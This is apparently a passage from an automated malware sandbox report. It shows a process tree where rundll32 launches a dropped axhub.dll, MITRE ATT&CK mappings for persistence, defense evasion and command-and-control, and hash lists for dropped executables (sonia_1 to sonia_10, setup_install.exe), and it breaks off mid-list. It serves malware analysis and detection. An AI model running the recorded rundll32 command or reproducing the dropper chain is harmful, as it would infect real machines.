                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                PID:7912
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                PID:5128
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:6324

                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1031

                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                BITS Jobs

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1197

                                                                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1089

                                                                                                                                                                                                                                                                                                BITS Jobs

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1197

                                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                                                                Remote System Discovery

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1018

                                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\libcurl.dll
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\libcurlpp.dll
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\libstdc++-6.dll
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\libwinpthread-1.dll
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\setup_install.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  6ee3a69de86ae9cc58f74ba2aeddce38

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  ed53ce3f4329e618823a5a0c789877a29ced0d97

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  14f7aa29b085bc1e65a24460893e657016366fb86a0a400c819129a5e6096eb2

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  264205b81c2d89ffbe3c20c94c4ff7565f51479db9346af67e3b946a9dab6bf4cbe897113ca55bb74a6d9a1315cdf7a1a30602c172d40a42a37ff1716a177cd5

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\setup_install.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  6ee3a69de86ae9cc58f74ba2aeddce38

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  ed53ce3f4329e618823a5a0c789877a29ced0d97

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  14f7aa29b085bc1e65a24460893e657016366fb86a0a400c819129a5e6096eb2

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  264205b81c2d89ffbe3c20c94c4ff7565f51479db9346af67e3b946a9dab6bf4cbe897113ca55bb74a6d9a1315cdf7a1a30602c172d40a42a37ff1716a177cd5

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_1.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  151ac4868889bf34489fec00289e2b68

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  2e7b27cf334c64b0b28c5ca5742b4d920fa0434b

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  0c1132ab8af5e8649d2b2402f57d99447b4e798db85529926cb1290c50a342b0

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  e1cae09dff04003ac5c411417ea4823031fec189274762369c07b8505d1cef45404e91cff03039dac41c47f1468675f4f7262716e81e92051db5a8fd52439bb9

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_1.txt
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  151ac4868889bf34489fec00289e2b68

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  2e7b27cf334c64b0b28c5ca5742b4d920fa0434b

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  0c1132ab8af5e8649d2b2402f57d99447b4e798db85529926cb1290c50a342b0

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  e1cae09dff04003ac5c411417ea4823031fec189274762369c07b8505d1cef45404e91cff03039dac41c47f1468675f4f7262716e81e92051db5a8fd52439bb9

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_10.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  4b7b7040e382433933113af4f7796f68

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  842983d7b1c47c2a7485d82ed9c549882af13ab2

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  efac214c4a49b1b33601b95dc8ef6b54eea4b772b52ad490fa18fb9df9621772

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  57a6e8e857dd3d051f75c3214a541ecff61bd51ef011d1bf0cf60868545f0bf070cd2ff0f9b65f0eec77ba4c076ea0a26544f642d036e296ba6e34391683c079

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_10.txt
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  4b7b7040e382433933113af4f7796f68

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  842983d7b1c47c2a7485d82ed9c549882af13ab2

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  efac214c4a49b1b33601b95dc8ef6b54eea4b772b52ad490fa18fb9df9621772

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  57a6e8e857dd3d051f75c3214a541ecff61bd51ef011d1bf0cf60868545f0bf070cd2ff0f9b65f0eec77ba4c076ea0a26544f642d036e296ba6e34391683c079

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_2.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  aca23edc97a7065dd632e96f897e9273

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  7e87ae9dea4bb86df66a86f89b5425e8d0d32587

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  97101c52a4dbf2d4efee574e7760c7284a16097c0c59f89fc55cf4e22b5a2abf

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  c793b600b674328f8c0201db8a42454748c0cb3249990cb3b0be89b79fd54386d51db7ecbbd1d1ff03d1c748dfa9f55ffdf229a6d518ef68f27d3a23c01e6a1c

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_2.txt
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  aca23edc97a7065dd632e96f897e9273

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  7e87ae9dea4bb86df66a86f89b5425e8d0d32587

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  97101c52a4dbf2d4efee574e7760c7284a16097c0c59f89fc55cf4e22b5a2abf

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  c793b600b674328f8c0201db8a42454748c0cb3249990cb3b0be89b79fd54386d51db7ecbbd1d1ff03d1c748dfa9f55ffdf229a6d518ef68f27d3a23c01e6a1c

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_3.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  a2d08ecb52301e2a0c90527443431e13

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  5811f5baf3d67bafc6f46036dd5deebd00f0ab96

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  e6c638f913e9137efc3b2b126d32dc7ea9bd03561df0213d1da137c4128636e9

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  1009795b15c3db597872e3562d3ccdee338ea36a9eec550676cfd060b921b6fcb000dce594ca4f9365d5c7baad214e6ee6057b9a3e47c8f4e3ae0c5a339e2a75

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_3.txt
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  a2d08ecb52301e2a0c90527443431e13

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  5811f5baf3d67bafc6f46036dd5deebd00f0ab96

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  e6c638f913e9137efc3b2b126d32dc7ea9bd03561df0213d1da137c4128636e9

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  1009795b15c3db597872e3562d3ccdee338ea36a9eec550676cfd060b921b6fcb000dce594ca4f9365d5c7baad214e6ee6057b9a3e47c8f4e3ae0c5a339e2a75

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_4.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_4.txt
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_5.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  8c4df9d37195987ede03bf8adb495686

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  010626025ca791720f85984a842c893b78f439d2

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  5207c76c2e29a2f9951dc4697199a89fdd9516a324f4df7fa04184c3942cc185

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  8fcb279c27682e13ec716e250c9d87cd3d9447b6376e4e6b97e8a283994c02eeac112f2e2c60d4e6316ece5e11fd992cd06efa48c72ee7b0c306b16347698655

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_5.txt
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  8c4df9d37195987ede03bf8adb495686

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  010626025ca791720f85984a842c893b78f439d2

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  5207c76c2e29a2f9951dc4697199a89fdd9516a324f4df7fa04184c3942cc185

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  8fcb279c27682e13ec716e250c9d87cd3d9447b6376e4e6b97e8a283994c02eeac112f2e2c60d4e6316ece5e11fd992cd06efa48c72ee7b0c306b16347698655

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_6.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  7515023169169d938797c15228e42ae7

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  8a325c2efaad6a7f25a4cd10182fcdf8298fb3d6

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  f2b5f5689c084ad0a75f43f6ca4f40799afe96219c22593c48f4aaac475d98bb

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  08ebc51e052ebbee41a9d4b6d5719e79962b5a288db6502fb6fc3dcb5276e57b578c9a794039be1106d694a8cb551892cc65820c439925d92f59d0e324990aea

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_6.txt
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  7515023169169d938797c15228e42ae7

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  8a325c2efaad6a7f25a4cd10182fcdf8298fb3d6

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  f2b5f5689c084ad0a75f43f6ca4f40799afe96219c22593c48f4aaac475d98bb

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  08ebc51e052ebbee41a9d4b6d5719e79962b5a288db6502fb6fc3dcb5276e57b578c9a794039be1106d694a8cb551892cc65820c439925d92f59d0e324990aea

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_7.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  a73c42ca8cdc50ffefdd313e2ba4d423

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  7fcc3b60e169fe3c64935de7e431654f570d9dd2

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  c7dcc52d680abbfa5fa776d2b9ffa1a8360247617d6bef553a29da8356590f0b

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  2bf103b2219839c3c17c88dc3248460dc518c5408a5deb5bea80a48ee713b3900c3b1dad8e27f643c01d49ad471761aaa5b0d53c3d507d96a5d92ca5517dac99

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_7.txt
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  a73c42ca8cdc50ffefdd313e2ba4d423

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  7fcc3b60e169fe3c64935de7e431654f570d9dd2

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  c7dcc52d680abbfa5fa776d2b9ffa1a8360247617d6bef553a29da8356590f0b

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  2bf103b2219839c3c17c88dc3248460dc518c5408a5deb5bea80a48ee713b3900c3b1dad8e27f643c01d49ad471761aaa5b0d53c3d507d96a5d92ca5517dac99

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_8.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  e66579343220149dc555cbcce3086a34

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  6fcb3cff21746a9a10b5e7c17d98277eaad170af

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  5bd43e92faa6951a007253361a6092e1a242a29c0febc47f7bc7628bc70f6819

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  2088d29a90e4040c44bd7233838f55ea7d74bad0e3e3589e37c498dd25fba4ea8058c2f77280d24d892b0589acfeeb84f54ab45e14c17791af8af1d3e43618b1

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_8.txt
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  e66579343220149dc555cbcce3086a34

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  6fcb3cff21746a9a10b5e7c17d98277eaad170af

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  5bd43e92faa6951a007253361a6092e1a242a29c0febc47f7bc7628bc70f6819

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  2088d29a90e4040c44bd7233838f55ea7d74bad0e3e3589e37c498dd25fba4ea8058c2f77280d24d892b0589acfeeb84f54ab45e14c17791af8af1d3e43618b1

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_9.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  3e2c8ab8ed50cf8e9a4fe433965e8f60

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  d4fdc3d0a8dd5d8c0b1ad9079ea0d02647248520

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  b67af6174c3599f9c825a6ea72b6102586b26600a3b81324ce71b9905c9c3ec6

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  eb3e0d0206f885c3dc6c44d8c4b7d3c87e1cd009515a7aa704cbc057d2da449f6be4d8431314cb62a2d0ad6e1678b7a269ff89f313a9894e0e6fc4f56fdcb5b4

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_9.txt
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  3e2c8ab8ed50cf8e9a4fe433965e8f60

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  d4fdc3d0a8dd5d8c0b1ad9079ea0d02647248520

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  b67af6174c3599f9c825a6ea72b6102586b26600a3b81324ce71b9905c9c3ec6

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  eb3e0d0206f885c3dc6c44d8c4b7d3c87e1cd009515a7aa704cbc057d2da449f6be4d8431314cb62a2d0ad6e1678b7a269ff89f313a9894e0e6fc4f56fdcb5b4

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  891da88856fcde02ebcc71193e9200e6

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  e5751ef0a761bf1d92b5b56849c4bd218f625dda

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  b25b662fe7354728334338fd8181b0fc7045e2649f4ddaf21aaf59071163e932

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  3332d8d07bda6715450ff00da2d057abf0e5c5212b9ce62003d09661b0b4990dd0e65843c21d4f6469b34103bebffe46a3a9a8ac6ea1b70ef61b4622c3743f61

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  891da88856fcde02ebcc71193e9200e6

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  e5751ef0a761bf1d92b5b56849c4bd218f625dda

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  b25b662fe7354728334338fd8181b0fc7045e2649f4ddaf21aaf59071163e932

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  3332d8d07bda6715450ff00da2d057abf0e5c5212b9ce62003d09661b0b4990dd0e65843c21d4f6469b34103bebffe46a3a9a8ac6ea1b70ef61b4622c3743f61

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  13abe7637d904829fbb37ecda44a1670

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  de26b60d2c0b1660220caf3f4a11dfabaa0e7b9f

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  7a20b34c0f9b516007d40a570eafb782028c5613138e8b9697ca398b0b3420d6

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  6e02ca1282f3d1bbbb684046eb5dcef412366a0ed2276c1f22d2f16b978647c0e35a8d728a0349f022295b0aba30139b2b8bb75b92aa5fdcc18aae9dcf357d77

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  7d50e41fedea9c1b46139b98629b5ba9

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  f395975657a459c3e07b18b8a7f7dbd515cb3334

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  07a6792d711d3fbea313b9c8273e49dc46d864a053bef0bf0368969560bb7dec

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  76d92cb15da9c8ef5200cfe3cc1c96cac7699af2ae930e0cb34fb75ecca54186e1290f7a47bf1ff03b65f630fe32d09d2f97794b2ab072ea96dc608a6a7065ec

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-B8TRG.tmp\sonia_5.tmp
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  ace50bc58251a21ff708c2a45b166905

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  3acac0fbed800fe76722b781b7add2cbb7510849

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  af5dd65e23533ed506a34f3a98f1255fccb480c88615ed7cfd0c157fb3f21f9d

                                                                                                                                                                                                                                                                                                  SHA512

